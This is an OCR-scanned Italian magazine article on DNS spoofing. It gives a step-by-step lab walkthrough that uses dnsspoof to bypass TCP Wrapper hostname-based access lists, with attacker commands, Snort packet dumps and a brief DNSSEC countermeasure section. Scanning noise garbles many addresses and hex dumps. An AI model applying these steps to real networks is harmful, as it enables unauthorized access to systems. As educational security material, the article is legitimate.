DNS nei sistemi Unix like. Il 
nome del demone responsabile della ri- 
soluzione dei nomi di dominio è named, 
e sarà proprio di esso che ci serviremo 
per applicare quanto spiegato nel corso 
di questo articolo. 

La strada di Bind e dei servizi DNS in ge- 
nerale è costellata di falle nella sicurezza, 
talvolta queste derivano dal demone ma 
altre volte da vulnerabilità insite negli 
stessi protocolli di rete. Il caso del DNS 
spoofing in particolare ricade nella se- 
conda categoria e per tale motivo risulta 
indipendente dal programma demone e 
dal sistema operativo. 

DNS Query & Reply 

Gli indirizzi basati su un nome 
sono più gradevoli e più facil- 
mente memorizzabili dalle per- 
sone, e per questo è necessario un servi- 
zio in grado di fornire una relazione tra i 
nomi di dominio e gli indirizzi IR Questa 
funzione è svolta dai server DNS. I resol- 
ver, ovvero i programmi che generano le 
interrogazioni verso un NS (NameSer- 
ver), si avvalgono del protocollo UDP, 



notoriamente insicuro in quanto non ga- 
rantisce l'avvenuta ricezione del pacchet- 
to da parte dell'host destinatario (non 
confermato) e non stabilisce una connes- 
sione (non connesso), dando modo ad 
un malintenzionato di ledere alla sicurez- 
za della sessione stessa. Una query DNS 
(interrogazione) può essere intercettata 
da un host remoto malevolo il quale, 
spoofando il source address del pacchet- 
to lf^ può inviare una risposta al mittente 
come se provenisse dal server DNS. La ri- 
sposta DNS conterrà informazioni atte al- 
l'alterazione della sessione che il mittente 
della query si appresta a intraprendere. 
Naturalmente questa tecnica avrà succes- 
so solo nel caso in cui la risposta fasulla 
dovesse giungere a destinazione prima 
della risposta legittima proveniente dal 
NS, nel qual caso verrebbe di conse- 
guenza ignorata. 

Spoofing: spacciarsi per un 
altro computer o un altro 
utente, appropriandosi delle 
sue credenziali. 



Dnsspoof 

Dnsspoof fa parte del pacchetto 
Dsniff reperibile all'indirizzo 
/www. moti key.org/~dug- 
song/dsniff, questo è anche il nome del 
tool che utilizzeremo durante la trattazio- 
ne di questo articolo per illustrare le mo- 
dalità con cui un attacker ha la possibili- 
tà di portare a termine con successo un 
attacco di DNS spoofing contro la nostra 
macchina. 

L'ambiente ideale per mettere in atto que- 
sta tecnica è rappresentato da una rete 
locale NON commutata, che agevola lo 
sniffing del traffico inoltrando i pacchetti 
a tutti gli host che la popolano, per 
esempio una rete dotata di Hub. 

3.1 Sintassi 

Dnsspoof viene usato nella seguente ma- 




dnsspoof [-i interface] [-f hostsfile] [ex- 
pression] 



-i interface rappresenta l'interfaccia di 
rete sulla quale si desidera rimanere in 
ascolto 

-f hostsfile permette di specificare il per- 
corso del file contenente le associazioni 
IP/hostname che si desidera spoofare, 
per esempio: 

1 92.1 68.1 .4 trust.linuxbox.com 
in questo modo qualsiasi query che cer- 
chi di risolvere il nome host trust.domi- 
nio.it riceverà una reply fasulla con l'IP 
192.168.1.1, la stessa cosa vale per le 
operazioni di lookup. 

expression permette di specificare delle 
espressioni al fine di filtrare in modo se- 
lettivo i pacchetti da sniffare 

3.2 Esempio 

Quello che segue è un semplice esempio 
che ha lo scopo di illustrare il funziona- 
mento di Dnsspoof prima di addentrarci 
nell'analisi degli attacchi veri e propri al- 
le risorse di rete: 

attacker@attack:~$ host trust 
trust.linuxbox.com. has address 
192.168.1.6 

Il comando host ci permette di interroga- 
re il nostro server DNS primario il cui in- 
dirizzo IP è contenuto all'interno del file 
/etc/resolv.conf. Nell'esempio il server 
DNS restituisce come risposta l'IP effettivo 
dell'host che risponde all'hostname 
trust.linuxbox.com. Ora proviamo ad 
eseguire il programma Dnsspoof in que- 
sto modo: 



attacker@attack:~# dnsspoof -f ^1 
~7hosts.txt udp dst port 53 
dnsspoof: listening on ethO [udp ^1 
dst port 53] 
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dove il file hosts.txt che si trova nella di- 
rectory ~ (home) dell'utente contiene le 
relazioni IP/hostname che si desidera 
spoofare, in questo esempio: 

1 92. 1 68. 1 .4 trust.linuxbox.com 

l'espressione "udp dst port 53" specifica 
che il programma si limiti a sniffare i so- 
li pacchetti UDP destinati alla porta 53, 
ovvero la porta adibita alle query DNS. 
Ora ripetiamo il comando host utilizzato 
in precedenza e se tutto è andato come 
previsto noteremo con sorpresa che l'o- 
putput del comando è cambiato e l'IP re- 
stituito dall'interrogazione è lo stesso che 
abbiamo fornito come input al program- 
ma Dnsspoof: 



attacker@attack:~$ host trust 
trust.linuxbox.com. has address ^1 
192.168.1.4 



Ecco l'output di Dnsspoof 



attacker@attack:~# dnsspoof -f ^1 
-/hosts.txt udp dst port 53 
dnsspoof: listening on ethO [udp ^1 
dst port 53] 

192.168.1.4.1079 > 192.168.1.5.53:^1 
34196+ A? trust.linuxbox.com 



Ma cosa è successo realmente? E' presto 
detto. Come si può notare poche righe 
più sopra, Dnsspoof ha sniffato una 
query proveniente dal nostro stesso host 
che rispondeva ai criteri specificati e ha 
anticipato la risposta del NS rispondendo 
in sua vece e fornendo un indirizzo IP fa- 
sullo. 

TCP Wrapper 

Tcpd, conosciuto anche con il 
nome di Tcp wrapper, è un de- 
mone che come molti altri pro- 
grammi fa affidamento al servizio DNS 
per risolvere i nomi host che interessano 
tale processo. 

E' proprio questa eccessiva fiducia che 
rende tale strumento del tutto insicuro se 
viene utilizzato in maniera errata. 
Lo scopo di tcpd è quello di monitorare la 
provenienza delle richieste inoltrate dal- 
l'esterno della rete e consentire o meno 
l'accesso a determinati servizi sulla base 
di liste di controllo degli accessi rappre- 
sentate rispettivamente dai file 
/etc/hosts.allow e /etc/hosts.deny 
Esso può essere tratto in inganno qualora 
facesse affidamento a un server DNS re- 



moto per la risoluzione degli hostname pre- 
senti nelle liste di controllo degli accessi. 

4.1 Tcpd bypass 

Un possibile scenario d'attacco è rappre- 
sentato da una rete locale con le seguen- 
ti specifiche: 



H Hostname 



Descrizione 



aitack.linuxbox.com 1 92. 1 68. 1 .4 Host dell'attacker 

dns.linuxbox.com 192.168.1.5 Server DNS 

attack.linuxbox.it 1 92.1 68.1 .6 Sistema "fidato" 

attack.linuxbox.it 1 92. 1 68. 1 .7 Server tcpd 

La tecnica che ci apprestiamo a descrive- 
re è resa possibile da un uso improprio 
delle liste di accesso hosts.allow e 
hosts.deny, come potremo vedere in se- 
guito è caldamente sconsigliato l'utilizzo 
di hostname come entry per questi file. 

/etc/hosts.allow: 
ALLtrust. linuxbox.com 

/etc/hosts.deny: 
ALLALL 

Il file hosts.allow permette l'accesso a tut- 
ti i servizi (ALL) purché la richiesta pro- 
venga dal sistema trust.linuxbox.com, il 
file hosts.deny rifiuta quasiasi accesso 
non sia esplicitamente indicato nel file 
hosts.allow. 

Ecco cosa accade se cerchiamo di con- 
netterci a victim dall'host attack, il quale 
da quanto specificato nelle access list 
non è autorizzato a stabilire una connes- 



attacker@attack:~$ telnet ^1 
192.168.1.7 23 
Trying 192.168.1.7. . . 
Connected to 192.168.1.7. 
Escape character is !A ] ! . 
Connection closed by foreign host. 



Il tentativo di connessione è scongiurato 
da tcpd! 

Qui di seguito l'output di Snort ci aiuta a 
capire cos'è successo e ci permette di fa- 
re alcune riflessioni, ogni pacchetto è 
commentato nei minimi dettagli al fine di 
rendere più semplice la comprensione: 



attacker@attack:~# snort - 
port 53 

02/18-20:05:13.455540 ^1 
192.168.1.7:1026 -> 192.16 



UDP TTL:209 TOS : 0x0 ID:26910 ^1 

IpLen:20 DgmLen:70 DF 

Len: 50 

9D FA 01 00 00 01 00 00 00 00 00 

00 01 34 01 31 4.1 ^1 

03 31 36 38 03 31 39 32 07 69 6E ^1 
2D 61 64 64 72 . 168 . 192 . in-addr 

04 61 72 70 61 00 00 OC 00 01 ^1 
. arpa 



L'host con IP 192.168.1.7 (victim), una 
volta contattato dall'host attack che desi- 
dera connettersi, controlla la propria li- 
sta di accesso alla ricerca di un IP/host- 
name che corrisponda a quello del siste- 
ma richiedente ovvero 192.168.1.4 (at- 
tack), la prima voce che trova è relativa 
all'hostname trust.linuxbox.com, a que- 
sto punto a victim non resta che risolve- 
re l'IP di cui è in possesso (192.168.1.4) 
nel rispettivo hostname al fine di verifi- 
carne un'eventuale corrispondenza. Per- 
tanto si rende necessaria un'interroga- 
zione al server DNS e qualora l'hostna- 
me ottenuto dovesse risultare pari a 
quello presente in hosts.allow l'accesso 
alle risorse sarà consentito. 



02/18-20:05:13.456022 ^1 

192.168.1.5:53 -> 192.168.1.7:1026 

UDP TTL:64 TOS : 0x0 ID:119 IpLen:20^l 

DgmLen: 137 

Len: 117 

9D FA 85 80 00 01 00 01 00 01 00 ^1 

01 01 34 01 31 4.1 

03 31 36 38 03 31 39 32 07 69 6E ^1 
2D 61 64 64 72 . 168 . 192 . in-addr 

04 61 72 70 61 00 00 OC 00 01 CO ^1 
OC 00 OC 00 01 .arpa 

00 01 51 80 00 15 06 61 74 74 61 ^1 
63 6B 08 6C 69 . .Q attack. li 

6E 75 78 62 6F 78 03 63 6F 6D 00 ^1 
CO 0E 00 02 00 nuxbox.com 

01 00 01 51 80 00 06 03 64 6E 73 ^1 
CO 3D CO 57 00 . . .Q dns. = .W. 

01 00 01 00 01 51 80 00 04 CO A8 ^1 
01 05 Q 



Il server DNS risponde a 192.168.1.7 
(victim) dicendo che l'hostname relativo 
all'IP del richiedente (192.168.1.4) risul- 
ta essere attack.linuxbox.com che è pale- 
semente diverso da trust.linuxbox.com. 



02/18-20:05:13.469858 ^1 

192.168.1.7:1026 -> 192.168.1.5:53 ^1 

UDP TTL:219 TOS : 0x0 ID:29268 ^1 

IpLen:20 DgmLen: 65 DF 

Len: 45 

9D FB 01 00 00 01 00 00 00 00 00 ^ 



m 


^^^^^^^^^^^^^^^^H 
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OGO 



LE DEBOLEZZE DEL SERVIZIO DNS 



00 


06 


61 


74 


74 


att 


61 


63 


6B 


08 


6C 


69 6E 75 78 62 6F ^1 


78 


03 


63 


6F 


6D 


ack . linuxbox . com 


00 


00 


01 


00 


01 





I 



A questo punto victim fa un'ulteriore ri- 
chista al fine di risolvere il nome host ot- 
tenuto in precedenza dal lookup di 
192.168.1.4 (attack.linuxbox.com) nuo- 
vamente nell'indirizzo IP per una mag- 
giore garanzia. 



02/18-20:05:13.470293 ^1 

192.168.1.5:53 -> 192.168.1.7:1026 

UDP TTL:64 TOS:0X0 ID:120 IPLEN:20 ^1 

DGMLEN:115 

LEN: 95 

9D FB 85 80 00 01 00 01 00 01 00 ^1 

01 06 61 74 74 ATT 

61 63 6B 08 6C 69 6E 75 78 62 6F ^1 
78 03 63 6F 6D ACK.LINUXBOX.COM 
00 00 01 00 01 CO OC 00 01 00 01 ^1 

00 01 51 80 00 Q. . 

04 CO A8 01 04 CO 13 00 02 00 01 ^1 

00 01 51 80 00 Q.. 

06 03 64 6E 73 CO 13 CO 41 00 01 ^1 

00 01 00 01 51 . .DNS. . .A Q 

80 00 04 CO A8 01 05 



L'IP restituito è nuovamente quello di at- 
tack ovvero 192.168.1.4. 
La connessione è perciò inibita dal tcp 
wrapper che non trova alcuna rispon- 
denza tra l'hostname restituito dal resol- 
ver (attack.linuxbox.com) e le voci 
contenute nelle liste di controllo. 
Come può un malintenzionato aggirare 
tali restrizioni d'accesso? 
Usando la tecnica del DNS spoofing na- 
turalmente! Torniamo al nostro esempio, 
ovvero stessi IP/hostname dello scenario 
d' attacco precedente, il nostro attacker 
potrà operare come segue al fine di ot- 
tenere un accesso non consentito al si- 
stema victim: 



attacker@attack:~# echo "192.168.1.4 ^ 
trust.linuxbox.com" > —/hosts.txt 
attacker@attack:~# cat —/hosts.txt 
192.168.1.4 trust.linuxbox.com 



In questo modo abbiamo creato il file 
hosts.txt nella dir ~ (home) dell' utente 
sul sistema attack, sarà lo stesso file che 
utilizzeremo come input per il program- 
ma Dnsspoof. 



attacker@attack:~# dnsspoof -f ^1 
-/hosts.txt 



dnsspoof: listening on ethO 
dst port 53 and not src 
192.168.1.4] 



I 



Ora Dnsspoof è in ascolto in attesa di 
qualsiasi DNS query il cui source address 
non corrisponda al nostro. 
Non vogliamo spoofare le query che ef- 
fettuamo noi vero? :) 
A questo punto non resta che stabilire 
una connessione con l'host victim che co- 
me vedete adesso accetta la nostra ri- 
chiesta e ci da accesso: 



attacker@attack : - 


$ telnet 


192. 16S 


.1.7 23 




Trying 


192.168.1 


7. . . 


Connected to 192 


.168.1.7. 


Escape 


character 


is ,A ] ' . 


victim 


login: 





Cosa è successo? Non siamo l'host trust 
eppure ci ha permesso di connetterci in 
quanto gli abbiamo fatto credere di es- 
serlo! 



attacker@attack:~# dnsspoof -f ^1 

-/hosts.txt 

dnsspoof: listening on ethO [udp ^1 

dst port 53 and not src 

192.168.1.4] 

192.168.1.7.1026 >192 .168 .1.5.53 : ^1 

53493+ PTR? 4 . 1 . 168 . 192 .in-addr .arpa 

192.168.1.7.1026 > 192.168.1.5.53: ^1 

53494+ A? trust.linuxbox.com 



Come si può vedere dall'output di 
Dnsspoof le query rivolte al DNS sono 
state tempestivamente intercettate e il 
programma ha provveduto a fornire ad 
esse una risposta come da noi richiesto 
e come se provenissero realmente dal 
server DNS, questo ha dato modo al 
demone tcpd di credere che l'hostname 
associato all'IP del richiedente 
(192.168.1.4) fosse proprio trust. linux- 
box. com il quale risulta autorizzato. 
Vediamo ora l'output di Snort che ci 
permette di scattare un'istantanea di 
quanto è avvenuto, ho provveduto a 
fornire i commenti dove l'ho ritenuto ne- 



attacker@attack:~# snort -vd udp ^1 
port 53 

02/18-19:50:43.511279 ^1 
192.168.1.7:1026 -> 192.168.1.5:53 
UDP TTL:106 TOS : 0x0 ID:36520 ^1 
IpLen:20 DgmLen:70 DF 



Len 

DO 
00 
03 
2D 
04 



50 
01 
34 
36 
64 
72 



00 00 01 00 00 00 00 00 ^1 

01 31 4.1 

38 03 31 39 32 07 69 6E ^1 

64 72 .168. 192. in-addr 

70 61 00 00 OC 00 01 ^1 



Victim chiede al server DNS a che host- 
name corrisponde l'IP address 
192.168.1 .4 per poter fare un confronto 
tra l'hostname del richiedente e l'hostna- 
me contenuto in hosts.allow ovvero 
trust.linuxbox.com. 



02/18-19:50:43.511764 192.168.1.5:53 ^1 

-> 192.168.1.7:1026 

UDP TTL:64 TOS: 0x0 ID:102 IpLen:20 ^1 

DgmLen:137 

Len: 117 

DO F5 85 80 00 01 00 01 00 01 00 01 

01 34 01 31 4.1 

03 31 36 38 03 31 39 32 07 69 6E 2D ^1 
61 64 64 72 .168. 192 .in-addr 

04 61 72 70 61 00 00 OC 00 01 CO OC ^1 
00 OC 00 01 .arpa 

00 01 51 80 00 15 06 61 74 74 61 63 ^1 
6B 08 6C 69 . .Q attack. li 

6E 75 78 62 6F 78 03 63 6F 6D 00 CO ^ 
0E 00 02 00 nuxbox.com 

01 00 01 51 80 00 06 03 64 6E 73 CO ^1 
3D CO 57 00 ...Q dns. = .W. 

01 00 01 00 01 51 80 00 04 CO A8 01 ^1 

05 Q. 



La risposta a tale query contiene l'host- 
name reale dell'host 192.168.1.4 ma 
quest'ultima ARRIVA DOPO la risposta 
fasulla fornita da Dnsspoof e pertanto 
viene ignorata. 



02/18-19:50:43.514447 ^1 

192.168.1.7:1026 -> 192.168.1.5:53 

UDP TTL:149 TOS : 0x0 ID:44934 ^1 

IpLen:20 DgmLen:64 DF 

Len: 44 

DO F6 01 00 00 01 00 00 00 00 00 00 ^1 

05 74 72 75 tru 

73 74 08 6C 69 6E 75 78 62 6F 78 ^1 
03 63 6F 6D 00 st.linuxbox.com. 
00 01 00 01 



Victim a questo punto richiede l'IP dell'- 
hostname ottenuto dalla query prece- 
dente che risulta appunto essere trust.li- 
nuxbox.com in seguito alla reply fasulla 
da parte di Dnsspoof:) 



02/18-19:50:43.514866 ^1 
192.168.1.5:53 -> 192.168.1.7:1026 
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C^Èmm 



UDP TTL:64 TOS:OxO ID:103 IpLen:20 ^1 

DgmLen:114 

Len: 94 

DO F6 85 80 00 01 00 01 00 01 00 ^ 

01 05 74 72 75 tru 

73 74 08 6C 69 6E 75 78 62 6F 78 ^1 
03 63 6F 6D 00 st.linuxbox.com. 

00 01 00 01 CO OC 00 01 00 01 00 ^ 

01 51 80 00 04 
Q... 

CO A8 01 06 CO 12 00 02 00 01 00 ^1 
01 51 80 00 06 

Q... 

03 64 6E 73 CO 12 CO 40 00 01 00 ^1 
01 00 01 51 80 

.dns. . .@ Q. 

00 04 CO A8 01 05 



Questa risposta sarà ricevuta solo IN SE- 
GUITO a quella fornita dal programma 
di spoofing del DNS e sarà pertanto 
ignorata. Alla luce di quanto detto victim 
crederà a tutti gli effetti di avere a che fa- 
re con trust.linuxbox.com e acconsentirà 
inconsapevolmente alla connessione di 
attack.linuxbox.com. 



Contromisure 

I servizi offerti da un server 
DNS sono vulnerabili allo 
spoofing a causa della totale 
assenza di un sistema di autenticazione. 
Un buon rimedio è rappresentato dall'u- 
tilizzo di software quale DNSSEC che ap- 
plica una firma digitale per assicurare la 
provenienza legittima delle reply da par- 
te di un server DNS autorizzato. Effetti 
collaterali quali la necessità di maggiore 
banda a disposizione, maggior mole di 
lavoro per la macchina e per l'ammini- 
stratore del sistema sono la causa princi- 
pale della lenta diffusione di DNSSEC. 



••••• •••• •• 
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Risorse 

Per ulteriori approfondimenti 
sull'argomento, si possono 
consultare i seguenti docu- 



menti: 

Bind Howto 
man Dnsspoof 
NFS Howto m 
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SCACCO AL DNS IN QUATTRO MOSSE 

Ecco come funziona il meccanismo del dns spoofing: 

attacker 




1 . Il computer della vittima richiede un sito al server DNS. 

2. Con uno sniffer di pacchetti, il computer dell'attacker intercetta la 
richiesta della vittima. 

3. Il computer dell'attacker invia alla vittima la risposta finta, che 
viene presa per autentica. 

4. Il server DNS invia la sua risposta, ma arrivando in ritardo 
rispetto a quella vera, cade nel vuoto e viene ignorata dalla vittima. 



















Jv V^ 















MA COS'È 
^STO DNS? 

Ogni computer su 
Internet viene 
identificato da un 
numero IP, tipo 192.168.0.2. 
Come è facile intuire, un 
indirizzo così è difficile da 
ricordare, e per questo si 
utilizzano dei nomi più 
amichevoli, come pluto.linux.it. 
Fino a una decina di anni fa, i 
computer su Internet non erano 
poi tanti, per risalire dal nome 
"comune" (pluto.linux.it) al 
numero IP (192 eccetera) bastava 
un semplice file di testo (il 
file HOSTS) che accoppiava nomi 
e numeri. Con la diffusione 
commerciale di Internet, è 
diventato impossibile aggiornare 
i file di ogni computer, e a 
metà degli anni ^80 è entrato in 
funzione il servizio DNS basato 
su server centrali. Quando 
inseriamo un indirizzo, il 
browser interroga il server DNS, 
che fornisce il numero IP del 
server che vogliamo contattare. 

TUTTE LE INFO 
UFFICIALI 

Ulteriori informazioni sui bachi 

di Bind sono disponibili sul 

sito Web dell' Internet Software 

Consortium, all'indirizzo 

www . isc . org/products/BIND/bind- 

security.html 

ANCHE I CLIENT DNS 
PIANGONO 

Le caratteristiche del sistema 
DNS non mettono in crisi 
soltanto i server che utilizzano 
il software Bind, ma anche 
alcuni client. In Mac OS, per 
esempio, è presente un bug che, 
in certe condizioni, manda in 
crash il sistema qualora riceva 
da un server DNS una risposta 
non perfettamente formattata. Una 
descrizione del baco, con tanto 
di exploit per una verifica del 
sistema, si trova all'indirizzo 
www. securitytracker.com/alerts/20 
02/Feb/1003618.html 
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